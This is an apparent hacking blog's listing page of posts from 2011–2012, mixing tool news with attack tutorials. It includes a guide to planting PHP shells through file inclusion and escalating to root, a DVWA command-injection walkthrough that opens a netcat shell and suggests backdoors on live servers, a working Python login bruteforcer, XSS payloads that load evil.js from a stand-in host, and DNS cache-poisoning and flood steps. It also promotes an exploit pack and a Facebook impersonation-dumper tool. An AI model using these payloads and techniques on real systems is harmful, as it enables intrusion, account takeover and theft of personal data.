Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Tuesday 28 February 2012

List of Hashing Algorithms Used In Major CMS & Forums

Just found this random image from one digital friend and its a pretty good list of hashing algorithms used in many web based applications such as CMS and forum softwares. Some of these algorithms might get outdated with newer versions, but still it will be a good reference.

list of hash algorithms for major web apps

View Full Size Image

Note for creator: If you are the owner of this image, please let me know so that I can give you the credit.


Read more...

Thursday 16 February 2012

Art of hacking 4 - spyd3rm4n's guide to hacking

Well this is the part 4 of the art of hacking series I've been posting here. Since the original site dmz has been down since long time, I have been uploading these tutorials. This part of tutorial explains what a PHP shell is and how you can use the php shell to gain the root access in the servers.

[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root

Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}

Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.

The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.

Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.

http://site.com/index.php?page=../../../../../etc/passwd

This will show the passwd on the linux box. Giving you directory listing for every user on it.

http://site.com/index.php?page=http://anothersite.com/evilshell.php

This will include the evilshell.php located at anothersite.com

Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like

include();
@include();

as long as the include() function includes user input, like

$page = $_GET['page'];

This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);

^ Jackpot.

Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:

Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.

That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.

Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:

There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)

Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.

Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}

- Credits : Kr3w of TheDefaced.


Read more...

Tuesday 14 February 2012

Hacking Step by Step For Beginners [Guest Post]

This article is an excellent step-by-btep tutorial for those who want to be hackers. Don't expect it to teach you step-wise process of hacking a website or an e-mail address. Instead, this tutorial is aimed to help you how you should proceed to really understand the computer systems so that you become a real computer hacker.


"How do you hack"? "I wanna to learn hacking". "How to get started"?
"How can I get the password"? "How do I crack "?


Does this sound like you? who needs to learn how to hack? And nobody
will even speak to you much less send you any info???


Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.

Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...

[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.

[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).

[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.

[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.

[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.

[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.

[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!

[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.

[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.

[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.

[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!

[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).

[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.

[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.

[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!

This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...

True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!

Reference and Copies:

17 Steps to Hack
Ubuntards
some cools stuff which i can't remember

The article was originally contributed by rhoit in the foss-nepal mailing list.



Read more...

Thursday 2 February 2012

Command Execution Vulnerability - Damn Vulnerable Web App Part 2

We had earlier worked out the bruteforce vulnerability in dvwa in part 1 of the series of articles on dvwa. Today, in this second part, we will be exploiting the command execution vulnerability within dvwa.

A bit about command execution: Command execution vulnerability is common in PHP-based and other web applications in which malicious attacker can inject the system level commands or codes that will get executed by the call to the system functions. This happens due to the lack of proper sanitization of the user input. Once again it proves the fact that Never trust user data. In our example, we will see direct command execution in the web server caused due to lack of input sanitization before calling the potentially unsafe function.

1) Lets login with our login information and click on the "Command Execution" item in the left navigation menu.

2) A HTML form with "Ping for free" will be available for you. So the input box wants IP address as the input and probably makes use of some system function such as shell_exec() or exec() or maybe system() to ping to the given IP address. First lets test if ping really works or not by typing "127.0.01" in the input textbox. Well we get the ping response and hence we come to know that some kind of system level function is being used to execute the ping command.


3) We have concluded that some PHP in-built function is being used to execute the ping command in the server so use of such functions opens the possibility of injection of our own commands if the input we give is not being filtered. In our case, IP address is the possible input we can play with to find the possible vulnerability. Lets try to tamper the input so I will give "127.0.0.1;ls -lia" (without quotes) as the input and we will check the output to know if our supplied command(ls -lia) gets executed or not. As the screenshot suggests, our command was successfully injected and we were able to see the output of "ls -lia" command.


4) The injected command in the previous step gave us the directory listing but we are hackers and we would like to get some shell access to the system so lets make use of the netcat to get simple shell to the system. Now lets inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes) which will create a FIFO(named pipe) in the filesystem so that two processes can access the same pipe(Interprocess communication becomes possible).

5) Now lets see if we got the shell or not by trying to connect to the web server. Now lets fire up the terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get the shell access and bingo!!! we got the shell access.


6)Now you can do whatever you want to do in the webserver. You could install backdoors for further access if you find such vulnerability in the live servers. Actually possibilities are unlimited, its up to your imagination and creativity once you get shell on the remote server.

Now lets check the source code of the vulnerable file:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    }
    
}
?> 

As we can see, shell_exec() function is taking the $target variable as the input which actually is supplied by user as the $_REQUEST['ip'] and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time when you are auditing source code, be sure to check arguments passed to such functions and you might be able to spot remote command execution in many PHP scripts.

I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.

Part 1 - Bruteforce Vulnerability


Read more...

Brute Force Vulnerability - Damn Vulnerable Web App Part 1

Welcome to the part 1 of the web hacking series based on damn vulnerable web application. I will be guiding all the beginners through the various web hacking technologies by using the open source DVWA application. I would like to suggest to try things on your own before reading all of these tutorials and you could actually use these series of tutorial as walkthroughs.

By now, I suppose you have already installed the damn vulnerable web application in your local web server(or maybe in local area network). Login to the DVWA interface with the default username/password combination which is admin:password Also we will first start with the low security level that can be set from within the interface by clicking on "DVWA security" link. So please set the security level as low and make sure you have not enabled PHPIDS for now.

In this very first tutorial, I will be guiding you in bruteforcing the login form which you can access from the "Brute Force" item in the left navigation menu.

*** For some reason, code looks ugly but copy/paste will work perfectly. ***

A bit of information on bruteforce: Bruteforce is a trial and hit method used to enumerate the working set of candidates for any system. In computer security field, bruteforcing is generally used to determine the authentication credentials by either making extensive guess using the permutation and combination methods(pure bruteforce) or by making use of dictionary(called dictionary attack). Usually, one of the keys is run through the same algorithm that has been employed in the system and the keys are tested on the system's authentication mechanism to determine the correct set of combinations. In our example, we will be performing dictionary attack on the web based form authentication system.

1) Lets test the login form with a random login information(I will test with admin:admin combination). And on giving wrong credentials, the login system shows us the error Username and/or password incorrect.. And we can see the URL in address bar changes to http://localhost/pvt/dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login#. The URL suggests us that form is using the GET method and hence our credentials are being part of querystring on the URL.

2) Manual bruteforcing might take a lot longer time than expected so its a good idea to write a form bruteforcer. Of course, there are several tools on the internet for form bruteforcing but we will write our own tool in python programming language. Writing a bruteforcer is not a very difficult task but I expect you know one of the programming languages. If not, I suggest you to grab the basics of at least one language among PHP, Python, PERL and Ruby. Our attack will actually be a dictionary attack, a variant of bruteforcing technique in which we will be testing several user:password combination to find if any of those combinations work.

3) I hope you have already learnt basics of one of the above said languages. Now lets create list of possible usernames and list of possible passwords. You might write these two lists separately in two files for big list but for now I'll be putting possible usernames and passwords as tuple in the python code itself.

users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")

4) Now we will use urllib2 python module to send the HTTP requests with our username:password combinations. So first lets create the URL we will make request with. We have earlier found that login information is being passed as the GET parameters so things will be little bit easier. We can directly craft the action URL using our combinations which will look as below:

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)

5) Now that we have successfully crafted the URL, we will have to add cookies to the request header. This can be easily done by using urllib2 module. We need to put cookies to reflect our logged-in status to the DVWA interface otherwise we will be redirected to the login page of DVWA itself. We can grab our cookies from the browser. I used "View Cookie Information" feature of "Web Developer" plugin I had installed in my firefox browser. The two cookie fields were PHPSESSID and security. So our code becomes:

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
        req = urllib2.Request(url)
        req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
        response = urllib2.urlopen(req)
        html = response.read()

6) Now we have successfully read the HTML response, we will just make use of the information we had earlier when our credentials were wrong. What I mean is that providing wrong credentials was throwing us an error Username and/or password incorrect. in the HTML output. Hence, we can search for this string and if this string is not present in the HTML output, we can be sure that our current username:password combination is working. Hence our final code becomes:
#!/usr/bin/python

import urllib2

users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
        req = urllib2.Request(url)
        req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
        response = urllib2.urlopen(req)
        html = response.read()
        if "Username and/or password incorrect." not in html:
            print "Working combination --- %s : %s" %(user, password)

7) Now lets run this code from terminal by typing python bruteforce.py and following was the result:

samar@Techgaun:~/Desktop$ python bruteforce.py
Working combination --- admin : password
Working combination --- 1337 : charley
samar@Techgaun:~/Desktop$

8) Lets see if our extracted combinations really work in the website. And voila!!! They work like a charm. This was just a very basic example on how you could bruteforce the HTTP forms and perform dictionary attack. I hope you learnt basic of bruteforcing from this tutorial.



Read more...

Tuesday 13 December 2011

Art of hacking 3 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.

Previous articles:
Part 1

Part 2


spyd3rm4n's guide to XSS Injection

Part 3

[0x01] XSS_Definition
[0x02] Pen-Testing
[0x03] Common Fields
[0x04] Escaping_BB_Code
[0x05] Image_XSS


Sub XSS_Defnition{

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued.

-Taken from Wikipedia Wikipedia if you want to read more.
}

Sub Pen-Testing{

Pen-Testing, short for Penetration Testing. Pen-testing with XSS can be very easy, or very hard. It depends on the person doing this. Some common queries when pen-testing a field can include but are not limited to:

<script>alert(1)</script>
<script language="javascript">alert(1)</script>
<script src="http://site.com/evil.js">
<img src="http://site.com/evil.js">


A great site to find some of the most useful queries it http://ha.ckers.org/xss.html

Now, once you've tested the fields, if the following page returned contains any sort of popup/javascript. You know it's vulnerable.

}

Sub Common_Fields{

Some of the most common fields that I have noticed are search fields. These will most likely return the following page showing the input.

Example: I search for "Orson Wells" and the page returned: 0 Results for query "Orson Wells" or something of that sort.

There are simple ways to get around this, since I am a php coder, my favorite way is the htmlentities(), you can also use strip_tags().

Some other search engines might not show what you searched for on the page itself, but in the field, the value is still there.

If this is the case, you can search for '"/></>[XSS]

this should escape the html field value, if it is not sanitized correctly and execute the [XSS] on the page.

Basically, any field that asks for user input that is either POST or GET and is in the source of the following page, can be cross-site scripted if not properly sanitized.

}

Sub Escaping_BB_Code{

This is one of my favorite ways to XSS a site. Some people decide to create their own BB code or use on that is poorly sanitized. This can be very easy to exploit.

Let's say there is an option to make my font red using hte [font color="red"] BB code.

Well, if I post a message with [font color="red"]hi[/font] and I look at the next page's source code, I see <font color="red">hi</font>,

I will re-post using

[font color="red"></font><script>alert(/hi/)</script>]hi[/font]

And if it is poorly sanitized, the page following it would contain an alert box saying /hi/.



There are so many different ways to escape BB code it is almost too easy. Some other sites have [IMG]. This one can be easy also.

[IMG]http://site.com/image"></><script src=http://site.com/evil.js>[/IMG]

would have

<img src="http://site.com/image"></><script src=http://site.com/evil.js>

}

Sub Image_XSS{

This is probably the best discovery to XSS since, whenever. With this, you can place javascript inside an image and have it execute in Internet Explorer.

Reffer to: http://milw0rm.com/video/watch.php?id=58

}


Read more...

Tuesday 22 November 2011

How To Check Your Password Strength

With the increase in number of hackers and hack attacks, choosing strong and hard to guess passwords is one of the ways to keep yourself secure. While there are other numerous parameters to take care of to keep yourself secure, one of the primitives is choosing the strong password. In this post, I'll let you know how you can determine the strength of the password you choose to use.

Strength of the password can be tested by studying the character combinations used in the password and there are some tools to assist you in this process.

The first tool is the password strength checker. This online tool gives a very comrehensive detail of the strenght of the password.


Another tool to test the strength of the password is to calculate the bruteforce attack time to retrieve the password from hash. One such tool is a excel template available HERE which gives the estimate of how fast a password is hacked by these widely available tools running on today's desktops. Another online tool for the similar purpose is howsecureismypassword.net which provides bruteforce time and informs if your password is the common one or not.

I hope you find this information useful. :)



Read more...

Wednesday 9 November 2011

Encoder/Decoder Tool From Techgaun [New Release]

I am glad to release this very small encoder and decoder tool that I coded just now around 10 minutes ago. I hope this tool will be useful for you.

Right now, the tool has the following options.

Base64 Encoding and Decoding
Rot13
URL Encoding and Decoding
String Reverse
MD5 and SHA1 Hash
HEX Encoding and Decoding
ASCII to Binary and Binary to ASCII

Encoder and Decoder Tool Online



Read more...

How To Crack Emesene Messenger Passwords Easily

Emesene is a lightweight messenger for MSN users. Now that Emesene stores the passwords for emails in users.dat file with very simple ASCII to Hex encryption, it is very easy to reverse it to get the passwords.

The users.dat file is located in /home/current_user/.config/emesene1.0/users.dat and you can view the content of this file by issuing the command as below:

cat ~/.config/emesene1.0/users.dat

The format in which the login information is saved is email:hex_encrypted_password:status which is later read by emesene in next launch. Now to get the original password, all you have to do is decrypt the hex string using the encrypter/decrypter tool.

Copy the hex encoded part(i.e. password part) from the users.dat file. Mine users.dat file was samar_acharya@hotmail.com:74657374696e67:busy where 74657374696e67 is the password in the hex form. All I have to do is open the encrypter/decrypter tool, paste this hex string in the input box, select the Hex decoding optioni from dropdown list and then click on Submit to get the actual password to my account.



Read more...

Wednesday 26 October 2011

Bleeding Life 2 Released By Blackhat Academy

Bleeding Life 2 is a browser exploit pack that affects the web browsers on the Microsoft Windows operating system with remote code execution and buffer overflows. The tool can be used to launch client side browser exploits to the vulnerable users.

The wiki page of Bleeding Life enlists the exploits and features of this tool.

For download, click HERE.


Read more...

SSL DOS Tool From The Hacker's Choice

On october 24, the german hackers group The Hacker's Choice released a new Denial of Service(DOS) tool that exploits the weakness in the SSL implementation to take the servers down.
THC-SSL-DOS is a tool to verify the performance of SSL.
The Hacker's Choice says:

Establishing a secure SSL connection requires 15x more processing
power on the server than on the client.

THC-SSL-DOS exploits this asymmetric property by overloading the
server and knocking it off the Internet.

This problem affects all SSL implementations today.


For more information and downloads, visit THC SSL DOS Page.



Read more...

Monday 12 September 2011

Facebook Pwn - Facebook Profile Dumper Tool

FBPwn is a cross-platform Java based Facebook profile dumper, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder.


Usage

A typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB, automated to increase the chance of you getting the info.

Typically, first you create a new blank account for the purpose of the test. Then, the friending plugin works first, by adding all the friends of the victim (to have some common friends). Then the clonning plugin asks you to choose one of the victims friends. The cloning plugin clones only the display picture and the display name of the chosen friend of victim and set it to the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls waiting for the friend to accept. As soon as the victim accepts the friend request, the dumper starts to save all accessable HTML pages (info, images, tags, ...etc) for offline examining.

After a a few minutes, probably the victim will unfriend the fake account after he/she figures out it's a fake, but probably it's too late!

Check FBPwn Google Code Page


Read more...

LinuxFoundation.org, Linux.com and their subdomains hacked

Linuxfoundation.org, linux.com and their subdomains have been compromised by the hackers and the linux foundation has taken all the related servers down for clean-up.

The index page of linuxfoundation.org and linux.com both state:

Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011. The Linux Foundation made this decision in the interest of extreme caution and security best practices. We believe this breach was connected to the intrusion on kernel.org.

We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.

We apologize for the inconvenience. We are taking this matter seriously and appreciate your patience. The Linux Foundation infrastructure houses a variety of services and programs including Linux.com, Open Printing, Linux Mark, Linux Foundation events and others, but does not include the Linux kernel or its code repositories.

Please contact us at info@linuxfoundation.org with questions about this matter.

The Linux Foundation




Read more...

Sunday 21 August 2011

Web Server[HTTP] Fingerprinting With httprint

Earlier I posted about web server fingerprinting using telnet however more sophisticated tools have been developed out there and one of them is httprint. httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask. httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. httprint uses text signature strings and it is very easy to add signatures to the signature database.

Features

-Identification of web servers despite the banner string and any other obfuscation. httprint can successfully identify the underlying web servers when their headers are mangled by either patching the binary, by modules such as mod_security.c or by commercial products such as ServerMask. Click here to see an example of how httprint detects disguised servers.

-Inventorying of web enabled devices such as printers, routers, switches, wireless access points, etc. Click on the sample HTML report.

-Customisable web server signature database. To add new signatures, simply cut and paste the httprint output against unknown servers into the signatures text file.

-Confidence Ratings. httprint now picks the best matches based on confidence ratings, derived using a fuzzy logic technique, instead of going by the highest weight. More details on the significance of confidence ratings can be found in section 8.4 of the Introduction to HTTP fingerprinting paper.

-Multi-threaded engine. httprint v301 is a complete re-write, featuring a multi-threaded scanner, to process multiple hosts in parallel. This greatly saves scanning time. *multi-threading is not yet supported in the FreeBSD version.

-SSL information gathering. httprint now gathers SSL certificate information, which helps you identify expired SSL certificates, ciphers used, certificate issuer, and other such SSL related details.

-Automatic SSL detection. httprint can detect if a port is SSL enabled or not, and can automatically switch to SSL connections when needed.

-Automatic traversal of HTTP 301 and 302 redirects. Many servers who have transferred their content to other servers send a default redirect response towards all HTTP requests. httprint now follows the redirection and fingerprints the new server pointed to. This feature is enabled by default and can be turned off, if needed.

-Ability to import web servers from nmap network scans. httprint can import nmap's xml output files.

-Reports in HTML, CSV and XML formats.

-Available on Linux, Mac OS X, FreeBSD (command line only) and Win32 (command line and GUI)

For more information and downloads, Check this link.

Also, if you want to learn more about webserver fingerprinting, I would highly recommend you to read this paper.



Read more...

Friday 19 August 2011

IPV6 Attacking Toolkit - THC-ipV6 Toolkit Released

The famous hackers group The Hacker Choice(THC) has released a set of tools to attack the IPv6 protocol. IPv6 is the descendant of IPv4 protocol which was purposed due to exhaustion of the IPv4 pool.

THC writes:

THC is proud to be the first who are releasing an comprehensive attack toolkit for the IPv6 protocol suite. It comprises of state-of-the-art tools for alive scanning, man-in-the-middle attacks, denial-of-service etc. which exploits inherent vulnerabilities in IPv6. Included is a fast and easy to use packet crafting library to create your own attack tools.


For more information on the project, visit the THC IPv6 Project Page.

Download Here



Read more...

Backtrack 5 R1 Released

The most widely used linux-based penetration testing distro, BackTrack had a new release yesterday. Backtrack 5 R1 was released on August 18 which adds 30 new tools in the famous hacker's distro.

Offsec team says:


We are really happy with this release, and believe that as with every release, this is our best one yet. Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack.
We’ve released Gnome and KDE ISO images for 32 and 64 bit (no arm this release, sorry!), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.


For downloads, visit Backtrack Download Page.





Read more...

Monday 25 July 2011

Wireshark 1.6.1 stable version released

The stable version of wireshark 1.6.1 has been released lately (July 18). Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto standard across many industries and educational institutions.

To download wireshark, visit this link.

Read more...

Tuesday 12 July 2011

Search Exploits & Vulnerability With Exploitsearch.net

The site, www.exploitsearch.net, is an attempt at cross referencing data from various sources and making the resulting database available to everyone.

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source sites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching.

www.exploitsearch.net

Currently utilizes data from NVD, OSVDB, SecurityFocus, Exploit-DB, Metasploit, Nessus, OpenVAS, and PacketStorm.Comes handy for better results. :)

Read more...

Thursday 9 June 2011

Advanced HTTP Fingerprinting With httprecon

One of the first steps in web server hacking involves fingerprinting to gather information regarding the web server and various mods applied to it. Fingerprinting the web server manually can be cumbersome so some good folks have developed an advanced open-source fingerprinting tool known as httprecon

*Description from official webpage:

The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.

Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easyness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.

Check the Page of httprecon project

Read more...

Saturday 28 May 2011

Attacking the DNS System Tutorial

This tutorial is written by mango1122 from governmentsecurity. Since its very informative, I have decided to post this tutorial over here.

--------------
INTRODUCTION
--------------

Domain Name System (DNS) associates various sorts of information with so-called domain names;
most importantly, it serves as the "phone book" for the Internet: it translates human-readable
computer hostnames, e.g. en.wikipedia.org, into the IP addresses that networking equipment
needs for delivering information. It also stores other information such as the list of mail exchange
servers that accept email for a given domain

The Berkley Internet Name Service (BIND) is the most common form of DNS server used on the Internet.
BIND typically runs on UNIX type systems. The DNS server stores information which it serves out about a
particular domain (also referred to as a namespace) in text files called zone files.A client (the resolver)
maintains a small amount of local cache which it will refer to first before looking at a local static host�s file
and then finally the DNS server. The result returned will then be cached by the client for a small period of time.

When a DNS server is contacted for a resolution query, and if it is authoritative (has the answer to the question
in its own database) for a particular domain (referred to as a zone) it will return the answer to the client. If it is
not authoritative for the domain, the DNS server will contact other name servers and eventually it will get the
answer it needs which is passed back to the client. This process is known as recursion.

Additionally the client itself can attempt to contact additional DNS servers to resolve a name. When a client does
so, it uses separate and additional queries based on referral answers from servers. This process is known as iteration


----------------------------
ATTACKING THE DNS CACHE
----------------------------

The most common attacks on DNS can be classified as

Zone Transfers or information disclosure attacks
Cache poisioning


CACHE POISIONING

Lets say a client in domain xyz.com wants to resolve www.google.com

1. The client will contact its configured DNS server and ask for www.google.com to be resolved.
This query will contain information about the client�s source UDP port, IP address and a DNS transaction ID.

2.If the information is available locally i.e cached ,it is returned to the client

3. If not then the client�s DNS server will contact the authoritive name server for google.com and resolve the query

4. The answer is passed back to the client and also cached locally in the DNS server of xyz.com (say ns1.xyz.com) and the client

5. Note the client only accepts the DNS information if the server replies with the correct client�s source UDP port, IP address and the DNS transaction ID




--------------------------------
Attack #1 � The Birthday Attack
--------------------------------

To poison the cache the attacker needs to

1 Send a number of resolution requests for google.com.An important thing
to note here is that each query for google.com is assigned a different transactio ID.

2. While the DNS resolves this the attacker sends a large number of spoofed replies
from ns1.google.com with different transaction ID.The attacker hopes to guess the
correct transaction ID as used the two name servers

Finding the correct IP addresses is easy; we know our target, and we know the addresses of the legitimate
nameservers for the domain to be hijacked. Finding the port is slightly harder. We know that the destination
port of the recursive query is UDP port 53, but the source port is a moving target. Fortunately for our attacker,
BIND will more often than not reuse the same source port for queries on behalf of the same client. So, if the
attacker is working from an authoritative nameserver, he can first issue a request for a DNS 3lookup of a
hostname on his server. When the recursive query packet arrives, he can look at the source port. Chances are
this will be the same source port used when the victim sends the queries for the domain to be hijacked.


--------------------------------
Attck #2 - Poisioning the Cache
--------------------------------

1. To obtain the source port we use a perl script.It needs to be run from an authoritative name server which
the attacker controls to query the target name server for a hostname for which the attacker�s machine is authoritative.

Another alternative would be to use a packet sniffer.

dns1.pl 10.10.10.50 www.google.com
source port: 34567

2. Now we run the second script written by Ramon Izaguirre called hds0.pl2.The script does most of the work by spoofing the reply from ns1.google.com

./hds0.pl (ns1.google.com) (ns1.xyz.com) (source port obtained from the earlier script) (spoof target)


To observe if the attack was successful simply query the target name server:

dig @12.12.12.12 www.google.com
www.google.com 86400 IN A 10.10.10.10

The attack is successful as google resolves yo 10.10.10.10

The script is available here-hxxp://securityvulns.com/files/birthday.pl


--------------------------------------
Attack #3 - DOS Attack on DNS servers
--------------------------------------

DNS servers like other Internet resources are prone to denial of service attacks.The only difference here would
be that DNS server uses UDP for name resolution.To create a DOS attack on the DNS server a script such as
dnsflood.pl can be executed on multiple clients to create the traffic.DNSflood works by sending many thousands
of rapid DNS requests, thereby giving the server more traffic than it can handle resulting in slower and slower
response times for legitimate requests.

